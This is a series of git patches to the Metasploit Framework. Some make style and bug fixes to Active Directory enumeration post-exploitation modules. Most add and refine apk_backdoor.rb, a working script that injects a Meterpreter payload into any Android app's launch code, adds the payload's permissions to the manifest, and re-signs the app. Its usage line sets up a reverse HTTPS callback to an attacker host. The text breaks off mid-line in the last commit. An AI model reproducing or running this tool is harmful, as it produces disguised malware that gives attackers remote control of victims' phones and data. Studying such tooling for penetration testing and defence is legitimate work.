:replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), u_logonCount: group_user[6][:value].to_i, u_userAccountControl: uac_int, - u_userPrincipalName: group_user[8][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - u_whenChanged: group_user[9][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - u_whenCreated: group_user[10][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + u_userPrincipalName: group_user[8][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_whenChanged: group_user[9][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_whenCreated: group_user[10][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), u_primaryGroupID: group_user[11][:value].to_i, u_badPwdCount: group_user[12][:value].to_i, - u_comment: group_user[13][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - u_title: group_user[14][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - u_cn: group_user[15][:value].to_s.encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + u_comment: group_user[13][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_title: group_user[14][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_cn: group_user[15][:value].to_s.encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), # Indicates that a given object has had its ACLs changed to a more secure value by the # system because it was a member of one of the administrative groups (directly or transitively). u_adminCount: group_user[16][:value].to_i, - u_manager: group_user[17][:value].to_s.encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + u_manager: group_user[17][:value].to_s.encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), # The login script is executed u_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, # The user account is disabled. @@ -273,23 +273,23 @@ class Metasploit3 < Msf::Post # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables. # Also add the sAMAccount type flags from https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637(v=vs.85).aspx sql_param_computer = { c_rid: computer_rid, - c_distinguishedName: comp[0][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - c_cn: comp[2][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - c_dNSHostName: comp[3][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + c_distinguishedName: comp[0][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_cn: comp[2][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_dNSHostName: comp[3][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), c_sAMAccountType: sat_int, - c_sAMAccountName: comp[5][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - c_displayName: comp[6][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + c_sAMAccountName: comp[5][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_displayName: comp[6][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), c_logonCount: comp[7][:value].to_i, c_userAccountControl: uac_int, - c_whenChanged: comp[9][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - c_whenCreated: comp[10][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + c_whenChanged: comp[9][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_whenCreated: comp[10][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), c_primaryGroupID: comp[11][:value].to_i, c_badPwdCount: comp[12][:value].to_i, - c_operatingSystem: comp[13][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - c_operatingSystemServicePack: comp[14][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - c_operatingSystemVersion: comp[15][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - c_description: comp[16][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - c_comment: comp[17][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + c_operatingSystem: comp[13][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_operatingSystemServicePack: comp[14][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_operatingSystemVersion: comp[15][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_description: comp[16][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_comment: comp[17][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), # The login script is executed c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, # The user account is disabled. From 8438774077d8322bbaffd204d3918e54a354b00c Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Mon, 21 Dec 2015 18:13:58 +0000 Subject: [PATCH 142/686] Bug --- modules/post/windows/gather/enum_ad_users.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/enum_ad_users.rb b/modules/post/windows/gather/enum_ad_users.rb index 48b8e86e62..a4989e887c 100644 --- a/modules/post/windows/gather/enum_ad_users.rb +++ b/modules/post/windows/gather/enum_ad_users.rb @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Post inner_filter << '(!(lockoutTime>=1))' if datastore['EXCLUDE_LOCKED'] inner_filter << '(!(userAccountControl:1.2.840.113556.1.4.803:=2))' if datastore['EXCLUDE_DISABLED'] inner_filter << "(memberof:1.2.840.113556.1.4.1941:=#{datastore['GROUP_MEMBER']})" if datastore['GROUP_MEMBER'] - inner_filter << "(#{datastore['FILTER']})" if datastore['FILTER'] + inner_filter << "(#{datastore['FILTER']})" if datastore['FILTER'] != "" case datastore['UAC'] when 'ANY' when 'NO_PASSWORD' From 4c27f381dcc900a2c13b950a5e36f7d02836e956 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Mon, 21 Dec 2015 18:15:19 +0000 Subject: [PATCH 143/686] rubocop & msftidy --- modules/post/windows/gather/enum_ad_groups.rb | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_groups.rb b/modules/post/windows/gather/enum_ad_groups.rb index f39cdca71b..e589a3373b 100644 --- a/modules/post/windows/gather/enum_ad_groups.rb +++ b/modules/post/windows/gather/enum_ad_groups.rb @@ -9,7 +9,7 @@ require 'msf/core' class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP -# include Msf::Post::Windows::Accounts + # include Msf::Post::Windows::Accounts USER_FIELDS = ['name', 'distinguishedname', @@ -19,9 +19,9 @@ class Metasploit3 < Msf::Post super(update_info( info, 'Name' => 'Windows Gather Active Directory Groups', - 'Description' => %{ + 'Description' => %( This module will enumerate AD groups on the specified domain. - }, + ), 'License' => MSF_LICENSE, 'Author' => [ 'Stuart Morgan ' @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Post register_options([ OptString.new('ADDITIONAL_FIELDS', [false, 'Additional fields to retrieve, comma separated', nil]), - OptString.new('FILTER', [false, 'Customised LDAP filter', nil]), + OptString.new('FILTER', [false, 'Customised LDAP filter', nil]) ], self.class) end @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Post @user_fields = USER_FIELDS.dup if datastore['ADDITIONAL_FIELDS'] - additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/,"").split(',') + additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/, "").split(',') @user_fields.push(*additional_fields) end @@ -71,8 +71,6 @@ class Metasploit3 < Msf::Post # @param [Array>] the LDAP query results to parse # @return [Rex::Ui::Text::Table] the table containing all the result data def parse_results(results) - domain = datastore['DOMAIN'] || get_domain - domain_ip = client.net.resolve.resolve_host(domain)[:ip] # Results table holds raw string data results_table = Rex::Ui::Text::Table.new( 'Header' => "Domain Groups", @@ -96,5 +94,4 @@ class Metasploit3 < Msf::Post end results_table end - end From e09c2944cfbdcc145eb875d00a4ea718a48e9def Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Mon, 21 Dec 2015 18:15:39 +0000 Subject: [PATCH 144/686] Renamed module to be more descriptive --- .../post/windows/gather/{ad_groupusers_to_sql.rb => ad_to_sql.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/post/windows/gather/{ad_groupusers_to_sql.rb => ad_to_sql.rb} (100%) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_to_sql.rb similarity index 100% rename from modules/post/windows/gather/ad_groupusers_to_sql.rb rename to modules/post/windows/gather/ad_to_sql.rb From f950633d322da1760c301f96dfaebe63689c8c67 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Mon, 21 Dec 2015 18:16:06 +0000 Subject: [PATCH 145/686] renamed --- modules/post/windows/gather/{ad_to_sql.rb => ad_to_sqlite.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/post/windows/gather/{ad_to_sql.rb => ad_to_sqlite.rb} (100%) diff --git a/modules/post/windows/gather/ad_to_sql.rb b/modules/post/windows/gather/ad_to_sqlite.rb similarity index 100% rename from modules/post/windows/gather/ad_to_sql.rb rename to modules/post/windows/gather/ad_to_sqlite.rb From e4e8930ccb1a605e3c53404ff47605a35721e1b4 Mon Sep 17 00:00:00 2001 From: Jack64 Date: Thu, 3 Sep 2015 19:30:25 +0100 Subject: [PATCH 146/686] APK Backdooring script Originally @ https://github.com/rapid7/metasploit-framework/pull/5611/ PR'ed again because I accidentally deleted my fork and couldn't make changes. --- tools/apk_backdoor.rb | 232 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 232 insertions(+) create mode 100644 tools/apk_backdoor.rb diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb new file mode 100644 index 0000000000..cb2ac12298 --- /dev/null +++ b/tools/apk_backdoor.rb @@ -0,0 +1,232 @@ +#!/usr/bin/env ruby +# +# This script is a POC for injecting metasploit payloads on +# arbitrary APKs. +# Authored by timwr, Jack64 +# + + +require 'nokogiri' +require 'fileutils' +require 'optparse' + +# Find the activity that is opened when you click the app icon +def find_launcher_activity(amanifest) + package = amanifest.xpath("//manifest").first['package'] + activities = amanifest.xpath("//activity|//activity-alias") + for activity in activities + activityname = activity.attribute("name") + category = activity.search('category') + unless category + next + end + for cat in category + categoryname = cat.attribute('name') + if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') + activityname = activityname.to_s + unless activityname.start_with?(package) + activityname = package + activityname + end + return activityname + end + end + end +end + +# If XML parsing of the manifest fails, recursively search +# the smali code for the onCreate() hook and let the user +# pick the injection point +def scrape_files_for_launcher_activity() + smali_files||=[] + Dir.glob('original/smali*/**/*.smali') do |file| + checkFile=File.read(file) + if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") + smali_files << file + smalifile = file + activitysmali = checkFile + end + end + i=0 + print "[*] Please choose from one of the following:\n" + smali_files.each{|s_file| + print "[+] Hook point ",i,": ",s_file,"\n" + i+=1 + } + hook=-1 + while (hook < 0 || hook>i) + print "\nHook: " + hook = STDIN.gets.chomp.to_i + end + i=0 + smalifile="" + activitysmali="" + smali_files.each{|s_file| + if (i==hook) + checkFile=File.read(s_file) + smalifile=s_file + activitysmali = checkFile + break + end + i+=1 + } + return [smalifile,activitysmali] +end + +def fix_manifest() + payload_permissions=[] + + #Load payload's permissions + File.open("payload/AndroidManifest.xml","r"){|file| + k=File.read(file) + payload_manifest=Nokogiri::XML(k) + permissions = payload_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + payload_permissions << name.to_s + end + # print "#{k}" + } + original_permissions=[] + apk_mani='' + + #Load original apk's permissions + File.open("original/AndroidManifest.xml","r"){|file2| + k=File.read(file2) + apk_mani=k + original_manifest=Nokogiri::XML(k) + permissions = original_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + original_permissions << name.to_s + end + # print "#{k}" + } + #Get permissions that are not in original APK + add_permissions=[] + for permission in payload_permissions + if !(original_permissions.include? permission) + print "[*] Adding #{permission}\n" + add_permissions << permission + end + end + inject=0 + new_mani="" + #Inject permissions in original APK's manifest + for line in apk_mani.split("\n") + if (line.include? "uses-permission" and inject==0) + for permission in add_permissions + new_mani << ''+"\n" + end + new_mani << line+"\n" + inject=1 + else + new_mani << line+"\n" + end + end + File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani } +end + +apkfile = ARGV[0] +unless(apkfile && File.readable?(apkfile)) + puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" + exit(1) +end + +jarsigner = `which jarsigner` +unless(jarsigner && jarsigner.length > 0) + puts "[-] Jarsigner not found. If it's not in your PATH, please add it.\n" + exit(1) +end + +apktool = `which apktool` +unless(apktool && apktool.length > 0) + puts "[-] APKTool not found. If it's not in your PATH, please add it.\n" + exit(1) +end + +apk_v=`apktool` +unless(apk_v.split()[1].include?("v2.")) + puts "[-] Apktool version #{apk_v} not supported, please download the latest 2.xx version from git.\n" + exit(1) +end + +begin + msfvenom_opts = ARGV[1,ARGV.length] + opts="" + msfvenom_opts.each{|x| + opts+=x + opts+=" " + } +rescue + puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" + puts "[-] Error parsing msfvenom options. Exiting.\n" + exit(1) +end + + + +print "[*] Generating msfvenom payload..\n" +res=`msfvenom -f raw #{opts} -o payload.apk 2>&1` +if res.downcase.include?("invalid" || "error") + puts res + exit(1) +end + +print "[*] Signing payload..\n" +`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey` + +`rm -rf original` +`rm -rf payload` + +`cp #{apkfile} original.apk` + +print "[*] Decompiling orignal APK..\n" +`apktool d $(pwd)/original.apk -o $(pwd)/original` +print "[*] Decompiling payload APK..\n" +`apktool d $(pwd)/payload.apk -o $(pwd)/payload` + +f = File.open("original/AndroidManifest.xml") +amanifest = Nokogiri::XML(f) +f.close + +print "[*] Locating onCreate() hook..\n" + + +launcheractivity = find_launcher_activity(amanifest) +smalifile = 'original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali' +begin + activitysmali = File.read(smalifile) +rescue Errno::ENOENT + print "[!] Unable to find correct hook automatically\n" + begin + results=scrape_files_for_launcher_activity() + smalifile=results[0] + activitysmali=results[1] + rescue + puts "[-] Error finding launcher activity. Exiting" + exit(1) + end +end + +print "[*] Copying payload files..\n" +FileUtils.mkdir_p('original/smali/com/metasploit/stage/') +FileUtils.cp Dir.glob('payload/smali/com/metasploit/stage/Payload*.smali'), 'original/smali/com/metasploit/stage/' +activitycreate = ';->onCreate(Landroid/os/Bundle;)V' +payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" +hookedsmali = activitysmali.gsub(activitycreate, payloadhook) +print "[*] Loading ",smalifile," and injecting payload..\n" +File.open(smalifile, "w") {|file| file.puts hookedsmali } +injected_apk=apkfile.split(".")[0] +injected_apk+="_backdoored.apk" + +print "[*] Poisoning the manifest with meterpreter permissions..\n" +fix_manifest() + +print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" +`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original` +print "[*] Signing #{injected_apk} ..\n" +`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey` + +puts "[+] Infected file #{injected_apk} ready.\n" From 764dc0ceb4f2fe8eb39d330a8d49ee7fad726dca Mon Sep 17 00:00:00 2001 From: Jack64 Date: Sun, 6 Sep 2015 02:02:42 +0100 Subject: [PATCH 147/686] Several fixes - Added tempdir - Fixed msfvenom call (now calling ../msfvenom instead of msfvenom) - Removed backticks for command execution (thanks @bcook-r7) --- tools/apk_backdoor.rb | 95 +++++++++++++++++++++++++------------------ 1 file changed, 55 insertions(+), 40 deletions(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index cb2ac12298..1854e8c29e 100644 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb @@ -5,10 +5,22 @@ # Authored by timwr, Jack64 # - +require 'tmpdir' require 'nokogiri' require 'fileutils' require 'optparse' +require 'open3' + + +def run_cmd(cmd) + begin + stdin, stdout, stderr = Open3.popen3(cmd) + return stdout.read + stderr.read + rescue Errno::ENOENT + return nil + end +end + # Find the activity that is opened when you click the app icon def find_launcher_activity(amanifest) @@ -36,9 +48,10 @@ end # If XML parsing of the manifest fails, recursively search # the smali code for the onCreate() hook and let the user # pick the injection point -def scrape_files_for_launcher_activity() + +def scrape_files_for_launcher_activity(tempdir) smali_files||=[] - Dir.glob('original/smali*/**/*.smali') do |file| + Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| checkFile=File.read(file) if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") smali_files << file @@ -72,11 +85,11 @@ def scrape_files_for_launcher_activity() return [smalifile,activitysmali] end -def fix_manifest() +def fix_manifest(tempdir) payload_permissions=[] - + #Load payload's permissions - File.open("payload/AndroidManifest.xml","r"){|file| + File.open("#{tempdir}/payload/AndroidManifest.xml","r"){|file| k=File.read(file) payload_manifest=Nokogiri::XML(k) permissions = payload_manifest.xpath("//manifest/uses-permission") @@ -84,13 +97,13 @@ def fix_manifest() name=permission.attribute("name") payload_permissions << name.to_s end - # print "#{k}" } + original_permissions=[] - apk_mani='' - + apk_mani="" + #Load original apk's permissions - File.open("original/AndroidManifest.xml","r"){|file2| + File.open("#{tempdir}/original/AndroidManifest.xml","r"){|file2| k=File.read(file2) apk_mani=k original_manifest=Nokogiri::XML(k) @@ -99,8 +112,8 @@ def fix_manifest() name=permission.attribute("name") original_permissions << name.to_s end - # print "#{k}" } + #Get permissions that are not in original APK add_permissions=[] for permission in payload_permissions @@ -109,6 +122,7 @@ def fix_manifest() add_permissions << permission end end + inject=0 new_mani="" #Inject permissions in original APK's manifest @@ -123,29 +137,29 @@ def fix_manifest() new_mani << line+"\n" end end - File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani } + File.open("#{tempdir}/original/AndroidManifest.xml", "w") {|file| file.puts new_mani } end apkfile = ARGV[0] unless(apkfile && File.readable?(apkfile)) puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" + puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" exit(1) end -jarsigner = `which jarsigner` -unless(jarsigner && jarsigner.length > 0) +jarsigner = run_cmd("jarsigner") +unless(jarsigner != nil) puts "[-] Jarsigner not found. If it's not in your PATH, please add it.\n" exit(1) end -apktool = `which apktool` -unless(apktool && apktool.length > 0) +apktool = run_cmd("apktool") +unless(apktool != nil) puts "[-] APKTool not found. If it's not in your PATH, please add it.\n" exit(1) end -apk_v=`apktool` +apk_v = apktool unless(apk_v.split()[1].include?("v2.")) puts "[-] Apktool version #{apk_v} not supported, please download the latest 2.xx version from git.\n" exit(1) @@ -160,48 +174,45 @@ begin } rescue puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" + puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" puts "[-] Error parsing msfvenom options. Exiting.\n" exit(1) end - +#Create temporary directory where work will be done +tempdir = Dir.mktmpdir print "[*] Generating msfvenom payload..\n" -res=`msfvenom -f raw #{opts} -o payload.apk 2>&1` +res = run_cmd("../msfvenom -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") if res.downcase.include?("invalid" || "error") puts res exit(1) end -print "[*] Signing payload..\n" -`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey` +print "[*] Signing payload..\n" +run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/payload.apk androiddebugkey") -`rm -rf original` -`rm -rf payload` - -`cp #{apkfile} original.apk` +run_cmd("cp #{apkfile} #{tempdir}/original.apk") print "[*] Decompiling orignal APK..\n" -`apktool d $(pwd)/original.apk -o $(pwd)/original` +run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") print "[*] Decompiling payload APK..\n" -`apktool d $(pwd)/payload.apk -o $(pwd)/payload` - -f = File.open("original/AndroidManifest.xml") +run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") + +f = File.open("#{tempdir}/original/AndroidManifest.xml") amanifest = Nokogiri::XML(f) f.close print "[*] Locating onCreate() hook..\n" - launcheractivity = find_launcher_activity(amanifest) -smalifile = 'original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali' +smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" begin activitysmali = File.read(smalifile) rescue Errno::ENOENT print "[!] Unable to find correct hook automatically\n" begin - results=scrape_files_for_launcher_activity() + results=scrape_files_for_launcher_activity(tempdir) smalifile=results[0] activitysmali=results[1] rescue @@ -211,8 +222,8 @@ rescue Errno::ENOENT end print "[*] Copying payload files..\n" -FileUtils.mkdir_p('original/smali/com/metasploit/stage/') -FileUtils.cp Dir.glob('payload/smali/com/metasploit/stage/Payload*.smali'), 'original/smali/com/metasploit/stage/' +FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") +FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" activitycreate = ';->onCreate(Landroid/os/Bundle;)V' payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" hookedsmali = activitysmali.gsub(activitycreate, payloadhook) @@ -222,11 +233,15 @@ injected_apk=apkfile.split(".")[0] injected_apk+="_backdoored.apk" print "[*] Poisoning the manifest with meterpreter permissions..\n" -fix_manifest() +fix_manifest(tempdir) print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" -`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original` -print "[*] Signing #{injected_apk} ..\n" -`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey` +run_cmd("apktool b -o #{tempdir}/#{injected_apk} #{tempdir}/original") +print "[*] Signing #{injected_apk} ..\n" +run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/#{injected_apk} androiddebugkey") + +run_cmd("cp #{tempdir}/#{injected_apk} .") +FileUtils.remove_entry tempdir puts "[+] Infected file #{injected_apk} ready.\n" + From 18e0a2f8966f9ac7032cf91300a03f01c78e8198 Mon Sep 17 00:00:00 2001 From: Jack64 Date: Sun, 6 Sep 2015 02:34:33 +0100 Subject: [PATCH 148/686] Update apk_backdoor.rb fixed msfvenom path resolution --- tools/apk_backdoor.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index 1854e8c29e..f280520064 100644 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb @@ -183,7 +183,8 @@ end tempdir = Dir.mktmpdir print "[*] Generating msfvenom payload..\n" -res = run_cmd("../msfvenom -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") +msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom")) +res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") if res.downcase.include?("invalid" || "error") puts res exit(1) From 719b333e96fa24d92cc293abf411dd9977342e93 Mon Sep 17 00:00:00 2001 From: Tim Date: Sat, 26 Sep 2015 18:41:58 +0100 Subject: [PATCH 149/686] chmod +x tools/apk_backdoor.rb --- tools/apk_backdoor.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 tools/apk_backdoor.rb diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb old mode 100644 new mode 100755 From 322382060561e7eaddc7ed640c09a6f4ff05497e Mon Sep 17 00:00:00 2001 From: Tim Date: Sat, 26 Sep 2015 19:08:06 +0100 Subject: [PATCH 150/686] fix tools/apk_backdoor.rb output file --- tools/apk_backdoor.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index f280520064..aa311f713b 100755 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb @@ -230,18 +230,16 @@ payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/ hookedsmali = activitysmali.gsub(activitycreate, payloadhook) print "[*] Loading ",smalifile," and injecting payload..\n" File.open(smalifile, "w") {|file| file.puts hookedsmali } -injected_apk=apkfile.split(".")[0] -injected_apk+="_backdoored.apk" +injected_apk=apkfile.split(".")[0] + "_backdoored.apk" print "[*] Poisoning the manifest with meterpreter permissions..\n" fix_manifest(tempdir) print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" -run_cmd("apktool b -o #{tempdir}/#{injected_apk} #{tempdir}/original") +run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") print "[*] Signing #{injected_apk} ..\n" -run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/#{injected_apk} androiddebugkey") +run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") -run_cmd("cp #{tempdir}/#{injected_apk} .") FileUtils.remove_entry tempdir puts "[+] Infected file #{injected_apk} ready.\n" From e5fb67f430e2138f7e4a6adc4f07bccee8c9e2cf Mon Sep 17 00:00:00 2001 From: Tim Date: Sat, 26 Sep 2015 19:15:23 +0100 Subject: [PATCH 151/686] fix version check > 2.0.1 --- tools/apk_backdoor.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index aa311f713b..1e81f5e885 100755 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb @@ -149,19 +149,19 @@ end jarsigner = run_cmd("jarsigner") unless(jarsigner != nil) - puts "[-] Jarsigner not found. If it's not in your PATH, please add it.\n" + puts "[-] jarsigner not found. If 